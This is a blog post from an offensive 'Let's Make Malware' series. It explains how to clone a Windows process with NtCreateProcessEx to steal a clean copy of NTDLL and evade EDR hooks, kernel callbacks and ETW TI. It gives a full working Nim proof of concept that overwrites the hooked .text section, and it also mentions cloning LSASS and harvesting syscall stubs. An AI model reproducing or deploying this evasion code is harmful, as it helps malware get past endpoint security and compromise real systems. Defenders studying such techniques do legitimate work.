Attack of The Clones - Unhooking and Syscall Stubs
Introduction
Today, we are going to return to our discussion on unhooking. In our Let’s Make Malware - Bypassing Behavioral Detections (Hooks and Trampolines) post, we talked about what function hooking is, how EDRs utilize it, as well as two methods for unhooking functions.
The method we discussed in that post was unhooking from files on-disk and we briefly touched upon unhooking from suspended processes (also called the Perun’s Fart technique).
There are, of course, other ways to do this such as unhooking from KnownDlls and unhooking from remote servers.
Unhooking from a suspended process allows us to avoid the pitfalls of opening a handle to NTDLL.dll on-disk and mapping it, but what if we could improve upon this technique further?
That’s exactly what we will look into accomplishing.
Unhooking from Suspended Processes
As we discussed in the post on hooks and trampolines, unhooking from suspended processes works because NTDLL.dll is one of the first DLLs to be loaded during process initialization. If we create a suspended process, we are halting its initialization right after this DLL has been loaded and prior to any others.
This means EDRs/AVs have not loaded their DLLs yet and thus have not hooked the functions within NTDLL.
A suspended process on its own is not inherently suspicious, however, a process that starts suspended gets some scrutiny. The problem here is that, to get a clean, unhooked copy of NTDLL in the first place, we cannot suspend our sacrificial process later. It must be done from the start.
Not to mention, we have kernel callbacks, Parent-Child process relationships and ETW (TI) to consider.
So, what can we do?
Enter Process Cloning
We can clone/fork the process! This lesser-known feature of Windows does not get enough love. There is a lot of potential here.
A process clone/fork is really exactly what it sounds like: a nearly identical copy of a process. Two excellent posts have already been written about this functionality that will be linked in the resources section, so we won’t dive too deep into it here.
What’s important to note is that process cloning allows us to get a clean copy of NTDLL. This is because the clone gets a copy of the original’s virtual memory address space.
So, not only do we get NTDLL, but we also get many of the other DLLs as well (and other goodies if we clone processes like LSASS).
So, why is this an improvement over suspended processes?
First, cloned processes (using the NtCreateProcessEx
function rather than NtCreateUserProcess
) do not create/clone threads automatically. Because of this, process/thread creation kernel callbacks do not trigger.
So, we have a ghost process as far as endpoint protection is concerned. Task Manager will not show these cloned processes.
Second, the clone is a child of the original process. This fixes any parent-child process anomalies.
Problems with Cloning
While this is an improvement over suspended processes, there are still some considerations to keep in mind.
The biggest is that we cannot clone just any process. If we clone a process that has the EDR’s DLLs loaded already and it’s copy of NTDLL is hooked, we end up replacing our process’s hooked NTDLL with another hooked NTDLL.
For that reason, we must ensure that the process we clone does not have the EDR’s DLLs loaded. We could create a suspended process just to clone it. From the EDR’s perspective, a suspicious activity occurred (process created initially suspended) but nothing else happened afterwards.
This would be a somewhat valid approach (we will discuss why only “somewhat” valid in a moment).
We could also enumerate all processes currently running and find one without the EDR’s DLLs. We can do this either manually or programmatically.
Otherwise, we can take a somewhat lazy approach and assume that the EDR won’t/can’t load DLLs into certain processes.
Fortunately for us, this is the case. Protected processes like lsass and services.exe do not seem to be touched by EDRs. However, we also cannot touch them.
Svchost looks like a valid target as does msedge, msteams, and dllhost.
Note: target processes that fit our criteria may vary.
The next problem is that although no kernel callbacks have been triggered by the creation of the cloned process, it isn’t entirely invisible.
NtCreateProcessEx
is likely hooked itself, and through callstack analysis, EDRs can see a process (which can be identified through the parent-process handle function argument) is being created/cloned.
This is also why creating a process just to clone it is only a “somewhat valid approach”.
Fortunately, this is easy enough to get around as we have the option of using syscalls or trampolines here.
However, we then run into the issue of reading a remote process’s virtual memory. Endpoint protection can also use callstack analysis here to identify our cloned process.
This issue is not specific to process cloning, but it is a consideration that must be made.
We can avoid the hook that is likely on the ReadProcessMemory
/NtReadVirtualMemory
function by again using syscalls or trampolines, but ETW TI will still log this action of reading a remote process’s virtual memory.
Normally, bypassing ETW TI would require us to be in kernel-mode, but once again we are in luck as new research has shown that we can get around parts of ETW TI (like reading virtual memory from a remote process) from userland if we have SE_DEBUG_PRIVILEGE enabled and are running some versions of Windows 10. This excellent post will also be linked in the resources section.
Proof of Concept
So, what does all this look like in code?
Well, it looks mostly identical to code for unhooking from a suspended process. Note: this code is also available here
import winim
import ptr_math
import std/dynlib
type NtCreateProcessEx_t = proc(ProcessHandle: PHANDLE, DesiredAccess: ACCESS_MASK, ObjectAttributes: POBJECT_ATTRIBUTES, ParentProcess: HANDLE, Flags: ULONG, SectionHandle: HANDLE, DebugPort: HANDLE, ExceptionPort: HANDLE, InJob: BOOLEAN): NTSTATUS {.stdcall.}
proc toString(bytes: openarray[byte]): string =
result = newString(bytes.len)
copyMem(result[0].addr, bytes[0].unsafeAddr, bytes.len)
proc getCleanNTDLL(): LPVOID =
var hNtdll = loadLib("ntdll.dll")
var status: NTSTATUS
var procOA: OBJECT_ATTRIBUTES
var hClone: HANDLE
var pNtdll: LPVOID
var NtCreateProcessEx = cast[NtCreateProcessEx_t](hNtdll.symAddr("NtCreateProcessEx"))
var hPowershell = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, 8648)
InitializeObjectAttributes(addr procOA, NULL, 0, cast[HANDLE](NULL), NULL)
status = NtCreateProcessEx(addr hClone, PROCESS_ALL_ACCESS, addr procOA, hPowershell, cast[ULONG](0), cast[HANDLE](NULL), cast[HANDLE](NULL), cast[HANDLE](NULL), FALSE)
if NT_SUCCESS(status):
echo "[+] Successfully Cloned!\n[!]New PID: ", GetProcessId(hClone), "\n"
else:
echo "[-] Error Cloning Process! Error Code: 0x", toHex($status)
var mi = MODULEINFO()
let ntdllModule = GetModuleHandleA("ntdll.dll")
GetModuleInformation(cast[HANDLE](-1), ntdllModule, addr mi, cast[DWORD](sizeof(mi)))
pntdll = HeapAlloc(GetProcessHeap(), 0, mi.SizeOfImage)
var dwRead: SIZE_T
let bSuccess = ReadProcessMemory(hClone, cast[LPCVOID](mi.lpBaseOfDll), pNtdll, mi.SizeOfImage, addr dwRead)
if bSuccess == 0:
echo "Failed in reading ntdll: ", GetLastError()
quit(QuitFailure)
return pntdll
proc unhook(cleanNtdll: LPVOID): bool =
var
oldprotect: DWORD = 0
SectionHeader: PIMAGE_SECTION_HEADER
let low: uint16 = 0
let hNtdll: HMODULE = GetModuleHandleA("ntdll.dll")
let DOSHeader: PIMAGE_DOS_HEADER = cast[PIMAGE_DOS_HEADER](cleanNtdll)
let NtHeader: PIMAGE_NT_HEADERS = cast[PIMAGE_NT_HEADERS](cast[DWORD_PTR](cleanNtdll) + DOSHeader.e_lfanew)
for Section in low ..< NtHeader.FileHeader.NumberOfSections:
SectionHeader = cast[PIMAGE_SECTION_HEADER](cast[DWORD_PTR](IMAGE_FIRST_SECTION(NtHeader)) + cast[DWORD_PTR](IMAGE_SIZEOF_SECTION_HEADER * Section))
if cmp(".text", toString(SectionHeader.Name)) == 0:
echo "Found .text section"
if VirtualProtect(cast[LPVOID](hNtdll + SectionHeader.VirtualAddress), SectionHeader.Misc.VirtualSize, 0x40, addr oldprotect) == 0: #0x40 = PAGE_EXECUTE_READWRITE
echo fmt"VirtualProtect Failed! Error Code: ({GetLastError()})."
return false
copyMem(cast[LPVOID](hNtdll + SectionHeader.VirtualAddress), cleanNtdll + SectionHeader.VirtualAddress, SectionHeader.Misc.VirtualSize)
if VirtualProtect(cast[LPVOID](hNtdll + SectionHeader.VirtualAddress), SectionHeader.Misc.VirtualSize, oldprotect, addr oldprotect) == 0:
echo fmt"VirtualProtect Failed! Error Code: ({GetLastError()})."
return false
return true
return false
when isMainModule:
echo "Press any key to continue..."
discard readLine(stdin)
let nt = getCleanNTDLL()
echo "Clean NTDLL Stored At: 0x", toHex(cast[ByteAddress](nt))
echo "Press any key to continue..."
discard readLine(stdin)
echo "Unhooking!"
let unhookResult = unhook(nt)
if unhookResult:
echo "NTDLL Has Been Refreshed!"
else:
echo "Could Not Refresh NTDLL!"
echo "Press any key to quit..."
discard readLine(stdin)
Let’s go through this Nim code piece by piece.
First, since NtCreateProcessEx
is an undocumented function, we cannot simply call it. First, we define its function signature. This is the line starting with type.
Second, we create a convenience function. This is our “toString” function (credits to the Offensive Nim repo and @byt3bl33d3r). All we do here is convert a byte array to a Nim String type.
Next, we have our “getCleanNTDLL” function. The first thing it does is get a handle to ntdll.dll. Then, using this handle, we find and save the address of the NtCreateProcessEx
function so we can use it.
Next, we get a handle to an arbitrary process. This will be the process we clone.
Note that the final parameter to OpenProcess
is a PID. So, we must make sure to change this to a value that exists on the target system. Otherwise, we can implement a function to do this automatically.
We call NtCreateProcessEx
to clone the process next and get back a handle to this new process.
Then, we find the base address and size of NTDLL.dll in our own process. Luckily for us, NTDLL.dll is mapped to the same address in every process, so by knowing where it is in our own process, we know where it is in other processes as well.
Once we have that information, we get the copy of NTDLL.dll in the clone process and save it in Heap memory.
Our unhook function takes the base address of our heap memory (that contains the clean copy of NTDLL.dll) and parses through it. It looks for the .text section, which contains all the instructions for the various functions we want to use, and then it overwrites our own process’s .text section with this clean copy.
Now, we can safely use NT API functions to do whatever our hearts desire.
Of course, we aren’t limited to just unhooking functions. We can also use this method to save syscall stubs or IDs.
To drive the point home, if we look at NTDLL.dll in our own process at the start, we can see that NtOpenProcess
(as well as others) do not look normal. The first instruction is jmp
whereas it should be mov r10, rcx
. This is how we know this function is hooked by the AV.
After we clone our target process and steal it’s clean copy of NTDLL.dll, we, of course, notice that NtOpenProcess
looks as it should. Also, note that our clone does not have a copy of the AV’s DLLs (atcuf64.dll and bdhkm64.dll) as the original did not.
The sky is the limit when it comes to cloning/forking processes.
Resources
Bill Demirkapi - Abusing Windows Implementation of Fork for Stealthy Memory Operations